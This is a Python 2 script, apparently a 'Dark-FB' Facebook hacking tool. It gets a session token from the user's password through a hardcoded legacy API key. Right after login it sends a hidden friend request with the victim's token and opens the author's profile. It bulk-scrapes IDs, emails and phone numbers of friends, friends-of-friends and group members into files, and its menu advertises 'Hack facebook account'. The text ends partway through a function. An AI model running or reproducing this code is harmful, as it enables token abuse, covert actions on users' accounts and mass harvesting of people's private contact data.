os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Pengaturan-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
#-Keluar-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Warna-#
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
#-Animasi-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """\033[1;97m█████████
\033[1;97m█▄█████▄█ \033[1;96m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;97m█\033[1;91m▼▼▼▼▼ \033[1;97m- _ --_--\033[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;97m█ \033[1;97m \033[1;97m_-_-- -_ --__\033[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;97m█\033[1;91m▲▲▲▲▲\033[1;97m-- - _ --\033[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;93mDark-Mod
\033[1;97m█████████ \033[1;96m«----------✧----------»
\033[1;97m ██ ██
\033[1;97m╔════════════════════════════════════════════╗
\033[1;97m║\033[1;93m* \033[1;97mAuthor \033[1;91m: \033[1;96mBROTHER• \033[1;97m ║
\033[1;97m║\033[1;93m* \033[1;97mGitHub \033[1;91m: \033[1;92m\033[4mgithub.com/cyber2611 :v\033[0m \033[1;97m ║
\033[1;97m╚════════════════════════════════════════════╝"""
# titik #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mLoading \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('reset')
masuk()
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Login"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Login using token"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Exit"
print "\033[1;97m║"
msuk = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;91m[☆] \033[1;92mLOGIN AKUN FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;91m[+] \033[1;36mPassword \033[1;91m:\033[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://www.facebook.com/yoga.wira.188.')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
print("\n\033[1;92m[#] Harap Login Ulang !")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(1)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
##### MENU ##########################################
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m User information"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get Id/email/hp"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Hack facebook account "
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot "
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Others "
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Show token "
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Delete trash "
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m LogOut "
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.remove('out')
elif zedd =="8":
os.system('rm -rf login.txt')
os.system('xdg-open https://www.facebook.com/rendi.andika.3133')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[✖] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Get ID Search"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Get group member ID"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Get group member email"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Get group member phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m Get email friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m10.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
os.system('reset')
print "\033[1;91mSegera"
keluar()
elif cuih =="4":
id_member_grup()
elif cuih =="5":
em_member_grup()
elif cuih =="6":
no_member_grup()
elif cuih =="7":
email()
elif cuih =="8":
emailfrom_teman()
elif cuih =="9":
nomor_hp()
elif cuih =="10":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM TEMAN #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(5000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
